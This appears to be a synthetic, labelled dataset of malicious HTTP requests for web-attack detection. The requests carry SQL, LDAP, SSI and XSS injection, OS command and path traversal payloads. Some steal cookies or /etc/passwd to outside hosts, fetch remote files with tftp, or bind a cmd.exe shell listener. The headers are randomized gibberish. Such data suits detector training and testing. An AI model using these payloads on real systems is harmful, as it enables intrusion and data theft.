Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46987
Start - Id: 41867
class: SqlInjection
GET /uXmOreplace.msf?eratojchB=i.4IaMR3vlT&dchalaeoeng=nIk2hK.AOJn&eubnlragtoe=5708&tTi8ey63eyk=iEt3&r9casdabstdbn=%27++++group++++by+++users.id++having+++1368%3D1368 HTTP/1.0
Host: 227.244.170.163:447
Connection: ifthiC
Accept: video/quicktime;q=0.1, text/plain
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 205.53.108.147
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="776"
Date: Thu, 31 Dec 09 13:53:56 GMT
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: hkedgyn
From: alubns@ssude.cz
If-Modified-Since: Sat, 02 Jan 10 24:30:58 UTC
If-Unmodified-Since: Fri, 08 Feb 08 01:48:16 CET
If-Match: *
If-None-Match: "t6mszVq2X.btelb"
If-Range: *
Max-Forwards: 3062
MIME-Version: 7.2
Pragma: nFroini=ooc
Proxy-Authorization: NTLM eGQwcHVjQ2R0ZXJvMm5tcmhhZWpxbGV0dW5lc1R5TWtuNFJtRW4=
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: /shanaj.gz
TE: gzip;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: mu9seeHe (ejIsD0L; xw0X@tG; ta1Nwrjvwf)
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: wlhee
Upgrade: prc/4.5, 2sFe/0.3
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41867
Start - Id: 39425
class: SSI
GET /7Vtp9OHBqf/hkD/nYmihfedeAobpo6tpfnp/shnnhefrai/TmIi/hoB@E82XJVj0Tqtd/ee8h.aspx?tegtTq=84&eKakiuOrtbiiji=73&Risdarh=9ie&bm7w=0820&yTlen=ae+4fpasswda%2B%25+ettj%2FluHT&rntNmamtxphea=o%40-Z9_2E7s&lvt7=enbbeheroqeeeE&oidh93srOatbreg=7252&khomeJY=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&mEdowhStnBy=eoR HTTP/1.1
Host: 215.13.187.114
Connection: keep-alive
Accept: application/*;q=0.6, video/*, text/*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.7, gzip;q=0.0, gzip, gzip;q=0.7
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 126.45.36.156
Cookie: bxanezUIt=464831
Cookie2: $Version="308"
Date: Tue, 27 May 08 09:06:24 UTC
ETag: W/"L9F0Hm1q-VFB2Ll@_A9"
Expect: 100-continue
From: w3by414@hseh.net
If-Modified-Since: Mon, 09 May 05 22:22:41 CET
If-Unmodified-Since: Wed, 02 Apr 08 16:11:58 CET
If-Match: *
If-None-Match: "cV82osmxVh7jSufW"
If-Range: *
Max-Forwards: 6813
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic c2FsZ250OjlzcDB0
Range: 02-,96-
Referer: /f7uidMr/once/NOdi.aspx
TE: deflate
Trailer: Upgrade
User-Agent: alB_26 http://www.peAelpra.fr
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: 1.4 www.i6Bq.gif:29, 8.9 117.112.188.30, 8.2 www.morecd.jpeg
Transfer-Encoding: identity
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39425
Start - Id: 47401
class: XSS
GET /oaqJRfPk673yh/ryD5P_t/cID/8updateeEechoPE/twyidkgq/aEacKzeemeems/ya41QZ.cfm?E1DynSy=%3Cdiv++style%3D%22background-image%3A+++url%28javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F152.236.236.138%2Fnsesis.dll%27%2Bdocument.cookie%29%3B%5D%29%3B+%22+%3E&gnes8sa=ltfsoconnectehttproU&ioMoisli=765&6oitio=7310884429 HTTP/1.1
Host: www.feh7ee.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: gb2312;q=0.8, x-mac-cyrillic;q=0.4, us-ascii, utf-7;q=0.8
Accept-Encoding: deflate;q=0.4, gzip;q=0.9
Accept-Language: SlzaaDg-plfed
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Thu, 15 Apr 04 09:26:03 UTC
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 3557
MIME-Version: 0.3
Pragma: lkfs=c2d
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: /4Eea.tar.gz
TE: trailers
Trailer: Range
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 2.2; ra-ut; rv:2.2.1) Gecko/39151108
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/4.9 83.108.112.70, TiEa/1.4 www.s0efd.jpeg:4799, HTTP/5.1 44.102.156.190
Transfer-Encoding: idune
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47401
Start - Id: 40024
class: SSI
GET /iHaQ-vTLcRfAVKRG/dPetc/oeno/lUktqWo6gDq/2BtfN_X/nPFcMqQyDYCY1.jpeg?oXetrsie0sltt=%3C%21--+++%23exec++++cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2Fsnctnxaso%2Fyremnn%22++--%3E&2xiGuee=l6&tEannNtgeoT9Px=2018&ds=S4dAzeuei&zg0a7X19@U=%5Den&cshvin1Rdgotfhe=4p%25wdrop&mpthhs=90&evtC8RHM=46392&Txasri=eBjY-h2mtNKv HTTP/1.1
Host: www.rPhualnarI.ch
Connection: keep-alive
Accept: image/png
Accept-Charset: x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 3.134.210.79
Cookie: tsNSc=28623;twohp=t']s&;14g4fhnXaA= wmleim aonift
Cookie2: $Version="3"
Date: Mon, 05 Dec 05 06:29:02 GMT
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: 100-continue
From: bic3us@lb0or.fr
If-Modified-Since: Sun, 11 Feb 07 03:54:13 CET
If-Unmodified-Since: Fri, 07 Nov 08 03:18:47 GMT
If-Match: *
If-None-Match: "dQmEz.uBsO8EW12"
If-Range: Sat, 13 Dec 08 07:43:08 CET
Max-Forwards: 02
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: Digest cnonce="ainumz"
Range: 639193-1,618159-02
Referer: http://www.7legog.gov/geoeqyo/my6tl/sbqot.nsf
TE: deflate;q=0.4,trailers
Trailer: Accept
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 5.0; io-e0; rv:8.1.7) Gecko/26078698
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: Nrnoel/4.3 www.oaaas.png:85930, 1.4 128.124.42.106:03, HTTP/9.5 www.H3sLt.gif
Transfer-Encoding: deflate
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 801 www.A9Ccfets.tiff "iayeatistfeuar6rsnb" "Tue, 13 Sep 05 19:40:44 GMT"
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40024
Start - Id: 41071
class: SqlInjection
GET /HqJBbgsoundsFcMPp/RMYV8XT22K2w6/TanrewtNlpeeRNlhee/cGU23/wciJubU/wpaTiAewoeaeonsahh/alnoelet.gif?bivrjronu1=eRlJn&szpoexecW=exec+xp_cmdshell+++%27%22eceydonA6%22+++++%3E%3E++script.vbs%27&xa=i-u5Wd9NO&gKhttpsNmochaFprocessing-instructiongHR=r63sntef40Nait7pam&16xrs=eimuDid&exelr=hta-f+%3Bpexcsdieo4t&asuiindhdn=643628923&t8nas=ebBy&tnt4eet4=tupe&8tzlm=etrgruith&b9=264109643 HTTP/1.0
Host: www.sdi1NbC.net
Connection: uvtu
Accept: image/*;q=0.3, audio/*;q=0.7, text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: mehom-rftCro, thadnkrt-rjiuLfyd
Cache-Control: no-cache
Client-ip: 26.111.242.56
Cookie: hOsoEttjbukcstp=uuhequtv1z;Ik5jceFMgMjusr=ts7snE
Cookie2: $Version="049"
Date: Mon, 14 May 07 17:12:07 GMT
ETag: W/"sUM3EPCj2Sen4b.1UGp-"
Expect: 100-continue
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 21 Aug 06 20:05:54 GMT
If-Unmodified-Since: Sat, 16 May 09 23:52:17 UTC
If-Match: "pwn5gxFi5EmwbP7"
If-None-Match: "zcPdgBi@hn6CJm3Kdr@."
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 549
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: NTLM bWVzRGVua2F3c2xpYXNobm5obWFueU9hN3lwdHRsaWN0dA==
Range: -4
Referer: http://www.5Tntn.uk/ieni/taor9t/tMfcoet/2rSre.jpeg
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.4 (X11; U; Unix 1.4; aT-tm; rv:8.0.8) Gecko/44424170
UA-CPU: 68000
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: 4.3 135.250.9.108, HTTP/9.2 188.112.15.103
Transfer-Encoding: os5Ete; lctSt=fwwht
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41071
Start - Id: 37255
class: LdapInjection
GET /TBOGGWLSpsFj/u2eugintafndetmunr/HdoenenbarsiMe/hN1wSQANc/lB1/ettmoDpei4/fjdCJwQXz1Ur/o4/dhGTT1Ynull/1do/lWelsITEF.n7h.sh?m4tlrnom=71453&aQw5Y=s&tvel=ud%29%28+++%7C%28ee%3D*%29&sutoefetaan0=61647944&gif=7719684&nbst9rc=nph-t6ihtajtahh&lOkX.N_eq6=2r7in1&uenhoea32tse=6954893&eornarbsic=Ewm%3B&zCiIFGS=Ac HTTP/1.0
Host: 253.139.117.171
Connection: close
Accept: text/xml;q=0.5
Accept-Charset: x-mac-hebrew;q=0.1, euc-tw;q=0.5, iso-2022-jp;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=0
Client-ip: 140.231.249.168
Cookie: ameiir=95799;cj=35yynhrn;2esrolep2pp=e9zdJ1i5+evs
Cookie2: $Version="2"
Date: Tue, 14 Oct 08 17:45:14 CET
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Fri, 11 Nov 05 03:30:23 GMT
If-Unmodified-Since: Mon, 14 Jan 08 19:47:27 UTC
If-Match: "KhTWC2PtYKBTJMTy"
If-None-Match: *
If-Range: *
Max-Forwards: 410
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: Basic b0JhN2xrOmVtbmQ=
Authorization: ocrob hd7wu=47ickg
Range: 690936-,5769-,6-
Referer: http://www.qRpsknlt.uk/rz90ik/scetok/eo2a.mspx
TE: trailers,gzip;q=0.3,deflate
Trailer: Referer
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 8.3; Em-ol; rv:3.7.8) Gecko/13879715
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: iaod/1.9 www.albtAee.gif
Transfer-Encoding: gzip
Upgrade: useuq/7.4, rtiw1o/5.5, ltnag/4.9, laahat/9.2
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37255
Start - Id: 43185
class: OsCommanding
GET /1jXo/eFHiLWgui/6QvNKuTE/nspscftesnyshewdhS/tp9uZglNnLDugxeRF5X./thjvNAOZrd7YkeIl49/AA9Rrehrra/rA7YoZR7t/cfPY/liei2nram.bin?senieweb5tettnh=astmenyxliEie&7asroviue=o9wK8VO&tdeenm=eaaMtj&ettie=07354&sIy=643965&seSiaZxJeotidhd=%27+%3B+++tftp+-c+++get+++++www.raornena.com%3A%2Fliletaan.tar&caaeceel=oxmltis+0xmlfrom3e HTTP/1.0
Host: 16.90.222.54:80
Connection: ihdpo
Accept: */*;q=0.7
Accept-Charset: koi8-r, windows-1253, iso-8859-15, iso-2022-kr;q=0.1, koi8-r
Accept-Encoding: identity;q=0.1, identity;q=0.7, identity;q=0.1, deflate;q=0.0
Accept-Language: eOoxd-waencqc;q=0.3, s6rvic-nei6b;q=0.8, nreey-xtn;q=0.3
Cache-Control: only-if-cached
Client-ip: 177.135.197.204
Cookie: satvefyiiu9o=725510;oWJX=?l5bgalle7sru)aHl8tt8;_g7WX=508;zahjwtaditEal=dgmEEab5;d8q=2760;exeAg=udocumentk2o4iluhpassthru
Cookie2: $Version="8"
Date: Fri, 17 Oct 08 21:16:26 GMT
ETag: "HABkqnWhO1su-A-n"
Expect: dyewmaae=oUdqj
From: 9aythl@Osdt.st
If-Modified-Since: Sun, 26 Apr 09 18:12:49 GMT
If-Unmodified-Since: Thu, 18 Sep 08 18:08:11 GMT
If-Match: *
If-None-Match: "t5Noiu8MlNn9wkv3"
If-Range: *
Max-Forwards: 0285
MIME-Version: 6.0
Pragma: nsb='9n'
Proxy-Authorization: 3ndn s8tn=stem
Authorization: Digest cnonce="hTsS"
Range: 332370-1588,656-95
Referer: /tueol1.js
TE: deflate;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 1.5; ss-re; rv:5.0.9) Gecko/95870749
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x846
Via: 0.1 www.eeelpgr.js, a2on/9.9 www.ia8a2ezO.gif
Transfer-Encoding: compress
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43185
Start - Id: 41918
class: SqlInjection
GET /xkasipnsl/EW.3au@Q@NQ/i0neR6n1rsoWup/nerr6sohd3eoCui/eeskDhIQvwRK5Q/e7wHd2e/rsqVIsw/systemR@/nytL8ripbLt1oamtrae.cgi?tinehDsaf=sopasswdn&brlePlro=3rnesita&pP5TkHJk=aCWaa&includejqx=4282&hn9e=41&elcl=chairs%27+++UNION+++SELECT+++++motcEemhtl+++FROM++dba_users+++WHERE+++name+++++like++%27%2525&5otsattt=iotT1lmaae&tjn=dal8noatfjioan&nkmo1i4nthaHpi=eWevLtVY&UmkHNrcpgA1PD=tdoIelfErv2sa&sye=8LrDEvs HTTP/1.0
Host: 216.213.144.194
Connection: close
Accept: image/png;q=0.0, text/*;q=0.2, video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 21.123.50.241
Cookie: pshtlhcpanaqii=vft
Cookie2: $Version="615"
Date: Tue, 11 Dec 07 16:27:10 UTC
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: PtDlsore@tsfosgnuwd.be
If-Modified-Since: Wed, 09 Apr 08 01:18:03 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: "MOw.QtwWt4XDqfU"
If-None-Match: *
If-Range: *
Max-Forwards: 049
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=tfau
Authorization: Digest realm
Range: -0
Referer: /1etjwnb/janaDonY.asmx
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: eVrMlHx http://www.Orni.st
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9010x724
Via: 3.6 73.190.91.238
Transfer-Encoding: deflate
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 206 www.hpaefstE.jpg "2ytytu1" "Wed, 13 Sep 06 14:39:38 GMT"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41918
Start - Id: 42660
class: SqlInjection
GET /oxQZAb3zSbic/eyafoscf/aeCARpabQFzBKbx5Fu/Kn/rzY6oz1Md/tfgPwLeQ2RfTUelIaJ/ne/iRGbmH3/acTSWtk4/f.uM830BAfd415n4Od.msf?arL7ptinr9Aee=OR+++%27vrisn5naa%27++IN+++++%28++%27++%27%29&nscwc=aozue&osol2a=1885837 HTTP/1.1
Host: www.eWiuioi.st
Connection: close
Accept: */*;q=0.8
Accept-Charset: utf-7
Accept-Encoding: 
Accept-Language: UE-reu8tTM;q=0.0
Cache-Control: max-stale=710
Date: Thu, 31 Dec 09 10:34:53 GMT
ETag: W/"l.gpCOT9l_T0QwKSgq"
Authorization: Basic ZWRueTpvZXlk
Referer: http://yeciS0e.de/fyb5E/ycaet/imeX/8eimeAca/hKSrnoi.pl
User-Agent: hkY6dIntax (tGLrwu; bE5VZuNEE; 4E0eZqns)
Via: 0.4 www.stIc.gif, HTTP/2.2 www.eei0e.gif
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42660
Start - Id: 47126
class: XSS
GET /yIetcDh9XSsreplaceobject/R0wXDDRfvnQ/eCM8wGZnOdVS9e4ZGGBw/he/gaethoof/YdrE2cwNrnses/rQu8.js?iirdErpre9itmnr=bsiIaacerae5%2F4y&hueachagehs=3t0aabX&xtc=2&neTeannadeeotsr=%3Cdiv+++++style++%3D+%22behaviour%3A+++url%28%5Bhttp%3A%2F%2Fwww.arna.com%2Fscript%2Fmb2itxewe.pl%5D%29%3B+%22++%3E&nyn=65425&VJdiD=ssrmetapi%7E3%26&gooiObtb3s=69837316&21eTs3iohaxrtw6=rrT&Ae7woaahh=a9ZROCL3qzy&5psEdtl5=Xddyyiec%28cralxc3%3E HTTP/1.1
Host: www.o3dtE.net:2078
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1252
Accept-Encoding: compress;q=0.2, deflate, deflate;q=0.2, compress;q=0.9, identity;q=0.2
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 111.27.185.154
Cookie: c4feIaxp4=utae~;lsao=tHxIj
Cookie2: $Version="5"
Date: Tue, 19 Sep 06 23:22:29 GMT
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Fri, 23 Feb 07 16:56:02 CET
If-Unmodified-Since: Sat, 25 Nov 06 06:53:58 CET
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 9
MIME-Version: 5.8
Pragma: tgtwsn='egth'
Proxy-Authorization: Digest qop=auth
Authorization: Basic NW90cnU6cjB1bW55
Range: 38-13,-4
Referer: /eErrno/rcoe/unyTtese/zthMhsev.png
TE: deflate
Trailer: Warning
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 1.3; th-Gd; rv:0.1.3) Gecko/26549106
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: 3.4 121.10.1.78, fncc/4.0 56.96.91.18:704, FTP/7.3 86.72.132.212
Transfer-Encoding: gzip
Upgrade: suae0/1.2
Warning: 864 www.2fnninsy.htm "ttlteoliomnN" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47126
Start - Id: 38059
class: LdapInjection
GET /aY@95Wq/jrDwhereTOExTK/enipsdnn6rahtshsin/dO8lRsfR_/ihereplacepVklQq4b/aoRwArbjVOvQm/olpui/Cn6likeexecXVmocha7UUncD/si/hUhYnlc4QIhH6M9EWD/neh3ttOaaneie.css?1axred2cncEgne=twbZoCs&amtirEwcsb=%29+++%28+++%7C++%28displayName%3Dhad*%29%28name++%3D++had*+%29%28+mail%3Dhad*++%29&t8wem2=bgsoundsiframez+&isda=De&xnp30eeeur=e%2Fa%2Bianan%5C%3Bla&et=yet%24ttqr HTTP/1.0
Host: 198.167.119.225
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ebrin-OE6Rpu, EHOdds-3vjotft;q=0.6, gDsy8u-ie;q=0.0
Cache-Control: no-store
Client-ip: 26.50.164.170
Cookie: oiqrozW=jzqlwocei;agogpdtraaiu=56;thobslqe=t5a;xRgG5Dyselect=5482;soRmLnOmqatqdah=06595650;7aqeuuoowrv=4302081613
Cookie2: $Version="7"
Date: Mon, 27 Dec 04 21:19:14 UTC
ETag: "8-dT7fhLzBVAAPYikD3-"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Sat, 27 Mar 04 06:28:03 CET
If-Unmodified-Since: Wed, 11 May 05 12:18:55 CET
If-Match: *
If-None-Match: "vG0-gZT3dhrjX25bEeV"
If-Range: Tue, 05 Oct 04 19:41:47 CET
Max-Forwards: 89
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest realm
Range: 129372-,-059,12157-
Referer: http://www.emli.ch/tehwec/gzrt/ii1hetde/ghhE.js
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.8 (Windows; U; Win98 4.0; de-ti; rv:1.3.9) Gecko/84755344
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: tWq/1.4 174.205.206.12
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38059
Start - Id: 36179
class: PathTransversal
GET /pKlLfqJbu.uoKWsV.htm?tuxssaheeiuto=eedf1hmTa5h&ho7shal=58137&lhEoedr6If2aT=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&5neN=954996&e9caKeDheoreyQ=bh+%25aoExieuh HTTP/1.1
Host: www.fsddaza.st:06
Connection: rcvy
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=8058
Client-ip: 164.124.198.233
Cookie: hJevtlhaott=70512055;eedr4EmO=o]ae$;2W1juoWXlocation7=2942
Cookie2: $Version="19"
Date: Wed, 20 Dec 06 24:21:34 UTC
Expect: oss8oa
From: hseoct@sy2ts.fr
If-Modified-Since: Mon, 14 Nov 05 23:19:34 GMT
If-Match: "-M4HgsDwz.LEKgF"
If-None-Match: *
If-Range: Sun, 15 Jun 08 14:41:43 UTC
Max-Forwards: 1
MIME-Version: 4.5
Pragma: ar838e=e
Authorization: NTLM MzFvbmFrdWliTXQzZTA1NzNJaXluWDdhY3V0aWFtaXNldXV4
Referer: http://szwcsw.uk/exbocaho/JCswyow/aplr/NNdhrsE/1nl5.cgi
TE: trailers
Trailer: Authorization
User-Agent: t8w2id2Raodrio
Via: tt9he/7.2 25.200.187.170, HTTP/9.7 13.73.226.230:5436
Transfer-Encoding: identity
Upgrade: yio/9.6, huzje/3.6, uaeeO/6.2
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36179
Start - Id: 42832
class: OsCommanding
GET /8V/ieellmen6odEz/bIvoSHAJF6x.Bei/poPyPwl--.DzPHO-w-Y7/aRew75plsh8it/lxtlhotfs/5MzDOcA-H5WQH0.@C/aJ5OfHHBpSNfSbInGto/wfCW8Wiz_Pm/2dciehnilhya.dll?O..HnYXaH=%7C+++shell%28++%22cmd++++%2Fc++++c%3AInetpubwwwrootMSISSnc.exe++++-l+++++-p++1972++-t+++++-e+++cmd.exe+++%22++++%29+%7C%27 HTTP/1.0
Host: www.hqIsen6h.com
Connection: W7n0fex
Accept: */*
Accept-Charset: utf-8;q=0.2, x-mac-roman
Accept-Encoding: *
Accept-Language: oertonf-qYusT, j-bu;q=0.6, isui-lEm9haw, s-ngoss
Cache-Control: only-if-cached
Client-ip: 188.218.7.177
Cookie: ytNse=eep23o9smotTog
Date: Mon, 27 Aug 07 21:46:50 GMT
ETag: "pei1_qWjREV5RDdbfc"
Expect: 100-continue
From: deCV@nnnan.ch
If-Modified-Since: Sat, 22 Nov 08 24:57:46 CET
If-Unmodified-Since: Sat, 28 Feb 04 23:24:11 UTC
If-Match: "qI24.dZDibJe3hmEe"
If-None-Match: *
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 3
MIME-Version: 7.9
Authorization: Basic dWVhUDpybm1ybWU=
Range: 2-3,62-,037879-912
Referer: /samilese/qewim/neeeOvO/oyncddSD/utweo.cfm
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.7 (compatible; wdzOf; Open BSD i586; rkcLnrh2lo; xvheivy)
UA-CPU: Sparc
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: compress
Upgrade: NhTeWO/2.9, teisee/0.9
X-Forwarded-For: 209.98.157.41
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42832
Start - Id: 39898
class: SSI
GET /oMlosed/or/Htmp-32/6aKLAl-nvarF2jvcF/uAottr/hd6dsotylyn9bsyfdje/ooeleIOsrer/qDXPW/tEJdv.css?PxnWj=524753584&@PmetaVf6F@AU=bhyt00oY0wOpg9uts&na=neay7deTe&Vv1yIMSprocessing-instruction.=amlneoEuye&nteOx7glzatFCtl=fMdr%26&rherb=2bwmtosRe&rmeec4rmsm=089232&e3cLvr4oabAooe=sdnl5wOWulennte&Tj=beqwrbl29ec6ire&r4esiaasete2qsc=82699&rs=119664465&n9usdohUTikh=%25&QVtB=%7C HTTP/1.0
Host: www.ierOr.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese, x-mac-roman;q=0.1, iso-8859-6, koi8;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: gp-7;q=0.8, 1ro3lR2-nrc, e0lc-sAeox;q=0.9, l-seqc
Cache-Control: no-store
Client-ip: 141.68.193.206
Cookie: 3cseF=<!--#exec   cmd="/bin/mail    9Eet.com   <    /etc/passwd"-->
Cookie2: $Version="9"
Date: Sat, 08 Jan 05 21:12:52 CET
ETag: "5ROh8uzbr3qedGYZYPG"
Expect: 100-continue
If-Modified-Since: Tue, 25 Dec 07 17:40:29 CET
If-Unmodified-Since: Mon, 11 Feb 08 17:17:42 UTC
If-Match: *
If-None-Match: "m.AuPxGoqqPFDz.u"
If-Range: Tue, 28 Nov 06 17:12:58 UTC
Max-Forwards: 02
Pragma: no-cache
Proxy-Authorization: Basic d2VhZXk6czVocWRPaA==
Authorization: NTLM aGVlaHJOTnNhck5udGJycHRjZTg4dVNub25sdGhlbHlvdGxBZW94cnJua2Fkbm9h
Referer: /ra6Sm/arn5/parahi/tixqi.mpg
TE: gzip,trailers
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 4.4; 7r-au; rv:3.1.2) Gecko/02384410
UA-OS: Solaris
Via: 9.1 www.egaen.tiff, FTP/8.5 www.s7tIVs.gif:2154
